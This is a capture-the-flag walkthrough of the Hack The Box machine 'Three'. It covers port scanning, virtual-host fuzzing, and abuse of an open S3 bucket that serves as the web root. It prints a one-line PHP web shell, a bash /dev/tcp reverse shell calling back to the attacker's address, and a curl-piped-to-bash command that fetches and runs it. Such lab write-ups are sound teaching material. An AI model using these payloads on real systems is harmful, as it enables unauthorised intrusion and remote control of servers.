Write-up - Three

2022-09-06 20:32:16

This is going to be a small write-up for the HTB "Starting Point" box Three.

We are given a server we know nothing about, just an IP (10.129.186.57). Note: the domain and every subdomain found below have to be registered in /etc/hosts by hand, pointing at that IP, because nothing on the HTB network resolves them for you. VPN_ADDRESS is your tunnel address (the tun0 interface), which you can find via ifconfig or ip addr.

First things first: information gathering.

So, knowing the IP, let's scan it.

nmap -sV -p- -T5 -vv 10.129.186.57

nmap is a tool to scan the ports of an IP address (and not only that). -sV means scan with version detection, -p- means scan all 65535 ports instead of the default top 1000, -T5 is the most aggressive timing template (fast, but noisy, and over a lossy VPN link it can drop ports, so -T4 is the safer default), -vv is very verbose and the last argument is the IP.

After this we receive the information that there are 2 open ports:

22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCitBp4qe2+WEqMGa7+L3eEgbrqD/tH3G5PYsQ9nMFx6Erg9Rp+jn7D9QqC9GqKdraCCUQTzVoW3zqEd83Ef4iWR7VXjTb469txJU+Y8XlG/4JzegbjO6WYyfQTtQ3nLkqpa21BZEdH9ap28mcJAggj4/uHTiA3yTgZ2C+zPA6LoIS7CaB1DPK2q/8wrxDiRNv4gGiSjcxEilpL8Qls4R3Ny3QJD89hvgEdV9zapTS5T9hOfUdwbkElabjrWL4zs/E+cyHSZF5pPREiv6QkdMmk7cvMND5epXA29womDuabJsDLhrFYFecJxDmXhv6yspRAemCewOX+GnWckerKYeOf
|   256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEkEPksFeIH9z6Ds6r7s2Uff45kDk/PEnvXYwP0ny6pKsP2s62W3PZVCywfF3aC8ONsAqQh6zy0s44Zv8B8g+rI=
|   256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINwGMkF/JG8KPrh19vLPmhe+RC0WBQt06gh1zE3EOo2q
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Toppers
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

22 and 80: SSH and an HTTP server (Apache 2.4.29, which the version scan already tells us). There is nothing to do with SSH without credentials, so let's check the website.

First things first, let's get all the information we can about the domain. We find the domain name "thetoppers.htb" by searching through the page source and the contact email on the site. Add it to /etc/hosts (10.129.186.57 thetoppers.htb) so that requests by name reach the box.

Seeing this, we can try a few things, like finding subdomains. One option is a zone transfer against a guessed nameserver (basically, guess that the nameserver is ns.DOMAIN).

We can do dig axfr thetoppers.htb @ns.thetoppers.htb (the query type is axfr, without a dash). If you get nothing back, that means the server does not allow zone transfers to you, which is the normal state of affairs. (Fun fact: this is one thing that still works against some universities.)

After trying one way to get subdomains, we can try another: fuzzing. You can use something like gobuster for this. Gobuster is a pretty good tool for going through a lot of names fast (and has a lot of other modes: dir, dns, vhost, fuzz).

But for this you need a wordlist. Here are some: https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt https://raw.githubusercontent.com/danTaler/WordLists/master/Subdomain.txt https://www.kali.org/tools/wordlists/

We can try something like gobuster vhost -u http://thetoppers.htb -w /mnt/hdd/Other/subdomain_list_20k.txt (on gobuster 3.2 and newer add --append-domain, otherwise each word is sent as a bare hostname instead of word.thetoppers.htb).

With this command gobuster does not ping anything: it sends an HTTP request to the same IP for every word in the list, with the Host header set to word.thetoppers.htb, and reports the names whose response (status code or size) differs from what an unknown name gets, for example a 200 or a 500 with a different body instead of the default site.
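To make concrete what gobuster is doing under the hood, here is an added example (not part of the original write-up and not gobuster's code) that performs the same virtual-host enumeration with curl: one request per word, only the Host header changing, and a hit reported whenever the status code or body size differs from the response an unknown name gets. It assumes the target IP and base domain from this box and a wordlist with one candidate subdomain per line; the wordlist path in the usage comment is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original write-up): manual virtual-host
# enumeration with curl, i.e. what "gobuster vhost" automates.
# Assumptions: the target answers HTTP on the given IP, the base domain is
# thetoppers.htb, and the wordlist has one candidate subdomain per line.

# Fingerprint one response as "<status> <bytes>" for a given Host header.
# The TCP connection always goes to $ip; only the Host header changes,
# which is exactly how Apache selects a name-based virtual host.
probe() {  # probe <ip> <hostname>
  curl -s -o /dev/null -m 5 \
       -H "Host: $2" \
       -w '%{http_code} %{size_download}' "http://$1/"
}

# A hit is any response that differs from the baseline an unknown vhost
# produces. Apache serves its default site for unknown names, so the size
# is a better signal than the status code alone (both are usually 200).
is_hit() {  # is_hit <baseline> <fingerprint>
  [ "$1" != "$2" ]
}

vhost_scan() {  # vhost_scan <ip> <domain> <wordlist>
  local ip="$1" domain="$2" wordlist="$3" baseline sub fp
  # Baseline: a name that certainly does not exist on the target.
  baseline=$(probe "$ip" "nonexistent$$.$domain")
  echo "baseline for an unknown vhost: $baseline" >&2
  while read -r sub; do
    [ -n "$sub" ] || continue
    fp=$(probe "$ip" "$sub.$domain")
    if is_hit "$baseline" "$fp"; then
      echo "$sub.$domain $fp"
    fi
  done < "$wordlist"
}

# Usage against the box (needs the network; not run automatically):
# vhost_scan 10.129.186.57 thetoppers.htb subdomains-top1million-5000.txt
```

If the default page embeds the requested hostname, every candidate will differ from the baseline by a few bytes and show up as a false positive; in that case widen is_hit to tolerate a small size delta (gobuster has an option to exclude a given response length for the same reason).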

After scanning with this wordlist we find out that there is a subdomain called s3.thetoppers.htb. Add it to /etc/hosts on the same line as the main domain.

Knowing what s3 means (AWS S3, or here an S3-compatible service answering on that virtual host), we can try some things to access it.

First things first, download and set up awscli, and configure it with a dummy account the first time (aws configure). Empty values won't work: the CLI refuses to send a request without an access key and secret, even though this server never checks them, so put something like temp for the access key, the secret key and the region.

Knowing that, we can try to get info about the buckets. (first, try the basic, like s3://… without the endpoint, to perhaps get on the)

aws --endpoint-url=http://s3.thetoppers.htb s3 ls

(--endpoint-url is the canonical name of the flag; the shorter --endpoint only works on awscli versions that accept abbreviated option names.) Running this command you can see the buckets the endpoint lists for us.

Running this we found out that there is a bucket visible there, s3://thetoppers.htb, so let's check what's inside:

aws --endpoint-url=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

Running this we can see everything inside the bucket: .htaccess, index.php and some other files. That is the same content the website serves, so the bucket is apparently the web root of the Apache site on port 80.

Knowing the bucket, we can check the permissions: for example, whether we can download something, overwrite it, or upload something new.

Firstly, let's try uploading an empty file. Create it with touch file.txt and upload it to the server:

aws --endpoint-url=http://s3.thetoppers.htb s3 cp file.txt s3://thetoppers.htb

If this is possible, great: we can upload things there, and with the bucket serving as the web root that makes the server vulnerable to arbitrary file upload. Confirm it with the ls command from above (file.txt should now appear) and with curl http://thetoppers.htb/file.txt (Apache should answer 200 with an empty body).
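The permission checks above (list, read, upload, delete) can be run as one pass. The following is an added example, not code from the write-up, that wraps awscli and reports which of the four a given endpoint and bucket allow with whatever dummy credentials aws configure set up. It assumes awscli is installed, the endpoint and bucket found above, and a key to read (index.php, which the ls showed); the marker object it uploads is removed again by the delete check.

```shell
#!/bin/sh
# Added example (not from the original write-up): probe an S3-compatible
# endpoint for list / read / write / delete on one bucket using awscli with
# the dummy credentials from "aws configure". Assumes awscli is installed.

s3() {  # s3 <endpoint> <aws s3 args...>: every call shares the endpoint
  local ep="$1"; shift
  aws --endpoint-url="$ep" s3 "$@" >/dev/null 2>&1
}

check_list()   { s3 "$1" ls "s3://$2/"; }
check_read()   { s3 "$1" cp "s3://$2/$3" -; }   # stream the key to stdout
check_write() {                                 # upload a tiny marker object
  local tmp rc
  tmp=$(mktemp)
  s3 "$1" cp "$tmp" "s3://$2/$3"; rc=$?
  rm -f "$tmp"
  return "$rc"
}
check_delete() { s3 "$1" rm "s3://$2/$3"; }     # also cleans up the marker

# s3_perm_check <endpoint> <bucket> <readable-key>
# Prints "list=yes|no read=yes|no write=yes|no delete=yes|no|skipped".
s3_perm_check() {
  local ep="$1" bucket="$2" key="$3" marker out
  marker="perm-check-$$.txt"
  if check_list "$ep" "$bucket"; then out="list=yes"; else out="list=no"; fi
  if check_read "$ep" "$bucket" "$key"; then out="$out read=yes"; else out="$out read=no"; fi
  if check_write "$ep" "$bucket" "$marker"; then
    out="$out write=yes"
    # DeleteObject reports success even for keys that never existed, so only
    # test delete on an object we know is there: the marker just uploaded.
    if check_delete "$ep" "$bucket" "$marker"; then out="$out delete=yes"; else out="$out delete=no"; fi
  else
    out="$out write=no delete=skipped"
  fi
  echo "$out"
}

# Usage against the box (needs the network; not run automatically):
# s3_perm_check http://s3.thetoppers.htb thetoppers.htb index.php
```

The delete check is deliberately chained after a successful write: an S3 delete of a missing key returns success, so testing it on its own would report a permission you may not have.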

Knowing this, we can try something more. Currently what we know:

  1. the server has a public bucket
  2. the bucket has PHP files in it
  3. the server is running PHP on Apache
  4. you can upload files

Knowing this, you can upload a file which passes a GET variable to PHP's system command.

Why so? GET variables can be added to URLs (basically example.com?stuff=1, which the script reads as $_GET['stuff']), so a one-line PHP file gives us a command runner we can drive from the browser.

Write the file and upload it to the bucket the same way as file.txt:

echo '<?php system($_GET["cmd"]); ?>' > shell.php
aws --endpoint-url=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

Then http://thetoppers.htb/shell.php?cmd=id should return the output of id, which proves both that the upload landed in the web root and that Apache executes what we put there.

https://www.php.net/manual/en/function.system.php

So we got a "shell", of sorts: one command per request, through the browser. But we can do more: we can gain real interactive access from our own console, not the browser. For that we have to do three things:

  1. make a location the "victim" can fetch our payload from
  2. listen for the connection it makes back to us
  3. send a bash file which gives us a reverse shell

Making a location to fetch from is easy. Do something like python3 -m http.server 8000 in the directory that holds the script to start a web server.

For listening we can use nc ( https://www.cyberithub.com/install-netcat-command-on-linux/ ):

nc -nvlp 1337

which is: -n don't resolve names (IP addresses only), -v verbose, -l listen for an incoming connection instead of connecting out, -p local port (1337, which has to match the port in the reverse shell below).

And then the last one, the reverse shell, which the victim will fetch from our http.server. Create a bash file which opens a TCP connection back to your IP, like:

#!/bin/bash
bash -i >& /dev/tcp/VPN_ADDRESS/1337 0>&1

-i makes bash act as an interactive shell; the rest is explained well here: https://unix.stackexchange.com/questions/525653/why-are-or-required-to-use-dev-tcp In short: bash treats /dev/tcp/HOST/PORT as a TCP socket, >& sends both stdout and stderr into that socket, and 0>&1 takes stdin from it as well, so whatever we type in nc reaches the shell and its output comes back to us. Save it as shell.sh in the directory where http.server is running.

Now, when everything is set up (http.server on 8000, nc listening on 1337), try this:

http://thetoppers.htb/shell.php?cmd=curl%20VPN_ADDRESS:8000/shell.sh|bash

(%20 is the URL-encoded space; if the | gets mangled on the way, encode it as %7C too.)

And now you have a reverse shell in the nc window, running as the user Apache runs as, which means full access to that user on the box.

Notes:

  1. aws doesn't work correctly on all systems with this box. Better use Kali or Parrot; Manjaro won't work that well.
  2. I would really advise reading up a lot on fuzzers. It will help you a lot, even more if you learn how to cover your tracks while fuzzing.
  3. Learn more about reverse shells. It's one of the most important things for creating a connection to the victim. It's good knowledge, even more so if you're doing the OSCP.
  4. Do the tasks on Kali.
  5. Learn more about nmap and nc.

And other things. This was kind of a "eureka, I need to learn more" moment with this box.


